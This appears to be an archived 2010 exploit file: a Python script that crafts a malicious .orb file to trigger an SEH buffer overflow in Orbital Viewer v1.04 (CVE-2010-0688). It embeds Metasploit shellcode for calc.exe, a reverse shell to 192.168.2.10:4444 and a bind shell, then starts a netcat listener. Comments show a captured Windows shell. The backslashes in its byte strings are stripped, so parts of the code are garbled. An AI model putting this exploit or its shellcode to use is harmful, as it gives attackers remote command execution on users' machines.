orbitalviewer-overflow.txt
Posted on 27 February 2010
#!/usr/bin/python # sinn3r: I'm just submitting this for mr_me # ################################################################ # # Orbital Viewer v1.04 (.orb) 0day Local Universal SEH Overflow Exploit # Date: 27 Feb 2010 # CVE: CVE-2010-0688 # Download: http://www.orbitals.com/orb/ov.htm # Found & exploited by: mr_me (http://net-ninja.net) # Greetz to: corelanc0d3r/eske/sinn3r/EdiStrosar/Rick2600/MarkoT/jnz/Redsees # Tested on: Windows xp sp3 # ################################################################ # Bad chars: x00x0axbdx0dx20 # Here we go.. ! ...all the way from Australia... # # [+] Orbital Viewer v1.04 (.orb) Universal SEH Overflow Exploit # [+] Shellcode options # 1: calc.exe # 2: reverse shell # 3: bind shell # [+] which shellcode? 2 # [+] Vulnerable file created! # [+] Listening on port 4444... # listening on [any] 4444 ... # 192.168.2.55: inverse host lookup failed: Unknown server error : Connection timed out # connect to [192.168.2.10] from (UNKNOWN) [192.168.2.55] 2222 # Microsoft Windows XP [Version 5.1.2600] # (C) Copyright 1985-2001 Microsoft Corp. # # C:Documents and SettingsSteve> # import sys, os print "|------------------------------------------------------------------|" print "| __ __ |" print "| _________ ________ / /___ _____ / /____ ____ _____ ___ |" print "| / ___/ __ / ___/ _ / / __ `/ __ / __/ _ / __ `/ __ `__ |" print "| / /__/ /_/ / / / __/ / /_/ / / / / / /_/ __/ /_/ / / / / / / |" print "| \___/\____/_/ \___/_/\__,_/_/ /_/ \__/\___/\__,_/_/ /_/ /_/ |" print "| |" print "|-------------------------------------------------[ EIP Hunters ]--|" print "[+] Orbital Viewer v1.04 (.orb) Universal SEH Overflow Exploit" # windows/exec - 303 bytes # http://www.metasploit.com # Encoder: x86/alpha_mixed # EXITFUNC=seh, CMD=calc.exe calc = ("xd9xf7xd9x74x24xf4x5bx53x59x49x49x49x49x49x49" "x49x49x49x43x43x43x43x43x43x43x37x51x5ax6ax41" "x58x50x30x41x30x41x6bx41x41x51x32x41x42x32x42" "x42x30x42x42x41x42x58x50x38x41x42x75x4ax49x4b" "x4cx4ax48x51x54x45x50x43x30x45x50x4cx4bx51x55" "x47x4cx4cx4bx43x4cx43x35x43x48x43x31x4ax4fx4c" "x4bx50x4fx44x58x4cx4bx51x4fx47x50x45x51x4ax4b" "x50x49x4cx4bx46x54x4cx4bx43x31x4ax4ex50x31x49" "x50x4ax39x4ex4cx4bx34x49x50x42x54x44x47x49x51" "x49x5ax44x4dx45x51x49x52x4ax4bx4bx44x47x4bx50" "x54x47x54x45x54x44x35x4dx35x4cx4bx51x4fx51x34" "x43x31x4ax4bx42x46x4cx4bx44x4cx50x4bx4cx4bx51" "x4fx45x4cx43x31x4ax4bx4cx4bx45x4cx4cx4bx43x31" "x4ax4bx4cx49x51x4cx46x44x43x34x48x43x51x4fx50" "x31x4ax56x43x50x50x56x42x44x4cx4bx50x46x50x30" "x4cx4bx47x30x44x4cx4cx4bx42x50x45x4cx4ex4dx4c" "x4bx42x48x45x58x4bx39x4ax58x4bx33x49x50x42x4a" "x50x50x42x48x4cx30x4cx4ax44x44x51x4fx45x38x4a" "x38x4bx4ex4dx5ax44x4ex46x37x4bx4fx4dx37x42x43" "x45x31x42x4cx43x53x46x4ex43x55x43x48x45x35x45" "x50x41x41") # windows/shell_reverse_tcp - 636 bytes # http://www.metasploit.com # Encoder: x86/alpha_mixed # LHOST=192.168.2.10, EXITFUNC=seh, LPORT=4444 rev = ("x89xe6xdaxd8xd9x76xf4x5ex56x59x49x49x49x49x49" "x49x49x49x49x49x43x43x43x43x43x43x37x51x5ax6a" "x41x58x50x30x41x30x41x6bx41x41x51x32x41x42x32" "x42x42x30x42x42x41x42x58x50x38x41x42x75x4ax49" "x4bx4cx42x4ax4ax4bx50x4dx4bx58x4cx39x4bx4fx4b" "x4fx4bx4fx43x50x4cx4bx42x4cx46x44x47x54x4cx4b" "x47x35x47x4cx4cx4bx43x4cx45x55x43x48x43x31x4a" "x4fx4cx4bx50x4fx42x38x4cx4bx51x4fx47x50x45x51" "x4ax4bx47x39x4cx4bx47x44x4cx4bx45x51x4ax4ex50" "x31x49x50x4ax39x4ex4cx4cx44x49x50x43x44x45x57" "x49x51x49x5ax44x4dx45x51x49x52x4ax4bx4ax54x47" "x4bx50x54x46x44x47x58x42x55x4bx55x4cx4bx51x4f" "x47x54x43x31x4ax4bx42x46x4cx4bx44x4cx50x4bx4c" "x4bx51x4fx45x4cx45x51x4ax4bx43x33x46x4cx4cx4b" "x4bx39x42x4cx51x34x45x4cx45x31x48x43x46x51x49" "x4bx42x44x4cx4bx50x43x50x30x4cx4bx47x30x44x4c" "x4cx4bx44x30x45x4cx4ex4dx4cx4bx51x50x43x38x51" "x4ex45x38x4cx4ex50x4ex44x4ex4ax4cx46x30x4bx4f" "x48x56x45x36x46x33x43x56x45x38x46x53x46x52x43" "x58x43x47x43x43x47x42x51x4fx46x34x4bx4fx4ex30" "x42x48x48x4bx4ax4dx4bx4cx47x4bx50x50x4bx4fx48" "x56x51x4fx4dx59x4dx35x43x56x4bx31x4ax4dx43x38" "x43x32x51x45x42x4ax43x32x4bx4fx48x50x43x58x4e" "x39x45x59x4bx45x4ex4dx46x37x4bx4fx48x56x51x43" "x46x33x51x43x51x43x51x53x51x43x47x33x46x33x4b" "x4fx4ex30x42x48x49x50x49x38x44x42x44x4ax42x46" "x42x48x42x31x51x4cx42x46x46x33x4cx49x4bx51x4d" "x45x42x48x4ax4cx4cx39x4ex4ax43x50x51x47x4bx4f" "x48x56x42x4ax42x30x46x31x50x55x4bx4fx48x50x45" "x36x43x5ax42x44x45x36x42x48x43x53x42x4dx43x5a" "x50x50x46x39x47x59x48x4cx4cx49x4ax47x43x5ax47" "x34x4cx49x4dx32x50x31x49x50x4ax53x4ex4ax4ax35" "x4dx59x4bx4dx4bx4ex51x52x46x4dx4bx4ex50x42x46" "x4cx4cx4dx43x4ax47x48x4ex4bx4ex4bx4ex4bx42x48" "x44x32x4bx4ex4ex53x42x36x4bx4fx44x35x47x58x4b" "x4fx4ex36x51x4bx46x37x50x52x50x51x50x51x50x51" "x42x4ax45x51x46x31x50x51x46x35x46x31x4bx4fx48" "x50x42x48x4ex4dx4ex39x44x45x48x4ex46x33x4bx4f" "x4ex36x42x4ax4bx4fx4bx4fx47x47x4bx4fx4ex30x43" "x58x4dx37x43x49x48x46x44x39x4bx4fx43x45x43x34" "x4bx4fx49x46x4bx4fx42x57x4bx4cx4bx4fx4ex30x45" "x38x4ax50x4dx5ax44x44x51x4fx51x43x4bx4fx4ex36" "x4bx4fx4ex30x41x41") # windows/shell_bind_tcp - 695 bytes # http://www.metasploit.com # Encoder: x86/alpha_mixed # EXITFUNC=seh, LPORT=4444, RHOST=192.168.2.55 bind =("xdbxc1xd9x74x24xf4x5bx53x59x49x49x49x49x49x49" "x49x49x49x43x43x43x43x43x43x43x37x51x5ax6ax41" "x58x50x30x41x30x41x6bx41x41x51x32x41x42x32x42" "x42x30x42x42x41x42x58x50x38x41x42x75x4ax49x4b" "x4cx43x5ax4ax4bx50x4dx4ax48x4cx39x4bx4fx4bx4f" "x4bx4fx45x30x4cx4bx42x4cx51x34x47x54x4cx4bx47" "x35x47x4cx4cx4bx43x4cx43x35x44x38x45x51x4ax4f" "x4cx4bx50x4fx42x38x4cx4bx51x4fx51x30x45x51x4a" "x4bx47x39x4cx4bx47x44x4cx4bx43x31x4ax4ex50x31" "x49x50x4dx49x4ex4cx4cx44x49x50x42x54x44x47x49" "x51x49x5ax44x4dx45x51x48x42x4ax4bx4cx34x47x4b" "x50x54x47x54x47x58x42x55x4dx35x4cx4bx51x4fx51" "x34x45x51x4ax4bx42x46x4cx4bx44x4cx50x4bx4cx4b" "x51x4fx45x4cx43x31x4ax4bx44x43x46x4cx4cx4bx4d" "x59x42x4cx47x54x45x4cx43x51x49x53x50x31x49x4b" "x43x54x4cx4bx51x53x46x50x4cx4bx47x30x44x4cx4c" "x4bx42x50x45x4cx4ex4dx4cx4bx51x50x43x38x51x4e" "x43x58x4cx4ex50x4ex44x4ex4ax4cx46x30x4bx4fx48" "x56x45x36x50x53x42x46x43x58x47x43x46x52x42x48" "x43x47x44x33x50x32x51x4fx46x34x4bx4fx48x50x43" "x58x48x4bx4ax4dx4bx4cx47x4bx46x30x4bx4fx49x46" "x51x4fx4cx49x4ax45x45x36x4dx51x4ax4dx44x48x45" "x52x46x35x43x5ax43x32x4bx4fx48x50x42x48x49x49" "x44x49x4cx35x4ex4dx50x57x4bx4fx4ex36x50x53x46" "x33x46x33x46x33x51x43x50x43x50x53x47x33x50x53" "x4bx4fx4ex30x45x36x42x48x44x51x51x4cx43x56x51" "x43x4cx49x4bx51x4dx45x43x58x49x34x44x5ax42x50" "x49x57x51x47x4bx4fx4ex36x42x4ax44x50x46x31x50" "x55x4bx4fx48x50x42x48x49x34x4ex4dx46x4ex4ax49" "x51x47x4bx4fx49x46x50x53x46x35x4bx4fx48x50x45" "x38x4dx35x51x59x4bx36x51x59x46x37x4bx4fx4ex36" "x46x30x46x34x51x44x51x45x4bx4fx48x50x4ax33x43" "x58x4ax47x42x59x49x56x42x59x51x47x4bx4fx49x46" "x46x35x4bx4fx4ex30x45x36x43x5ax45x34x43x56x42" "x48x42x43x42x4dx4dx59x4dx35x42x4ax46x30x51x49" "x47x59x48x4cx4dx59x4bx57x43x5ax51x54x4bx39x4a" "x42x50x31x49x50x4bx43x4ex4ax4bx4ex51x52x46x4d" "x4bx4ex50x42x46x4cx4dx43x4cx4dx42x5ax46x58x4e" "x4bx4ex4bx4ex4bx45x38x42x52x4bx4ex4ex53x45x46" "x4bx4fx43x45x47x34x4bx4fx4ex36x51x4bx46x37x50" "x52x46x31x46x31x46x31x42x4ax43x31x46x31x46x31" "x46x35x46x31x4bx4fx4ex30x42x48x4ex4dx48x59x45" "x55x48x4ex46x33x4bx4fx49x46x42x4ax4bx4fx4bx4f" "x46x57x4bx4fx4ex30x4cx4bx46x37x4bx4cx4dx53x48" "x44x45x34x4bx4fx48x56x50x52x4bx4fx48x50x45x38" "x4cx30x4cx4ax45x54x51x4fx46x33x4bx4fx49x46x4b" "x4fx4ex30x41x41"); header = "x4fx72x62x69x74x61x6cx46" header += "x69x6cx65x56x31x2ex30x0dx0a" nops = "x90" * 1010 fly = "xe9xc8xf9xffxff" nseh = "xebxf9x90x90" seh = "x50x82x45" # partial overwrite - ppr from ov.exe print "[+] Shellcode options" print " 1: calc.exe" print " 2: reverse shell" print " 3: bind shell" msg = '[+] which shellcode? ' uin = raw_input(msg).strip() if not uin: print "[-] You have not entered 1,2 or 3, quiting" sys.exit(1) if uin == '1': junk = "x41" * (5045 - len(calc)) lol = header + junk + nops + calc + fly + nseh + seh; if uin == '2': junk = "x41" * (5045 - len(rev)) lol = header + junk + nops + rev + fly + nseh + seh; if uin == '3': junk = "x41" * (5045 - len(bind)) lol = header + junk + nops + bind + fly + nseh + seh; try: vulnerable = open("mr_me-owns-orbital.orb",'w') vulnerable.write(lol) vulnerable.close() print "[+] Vulnerable file created!" if uin == '2': print "[+] Listening on port 4444..." os.system("nc -lvp 4444") except: print "[-] Error occured!"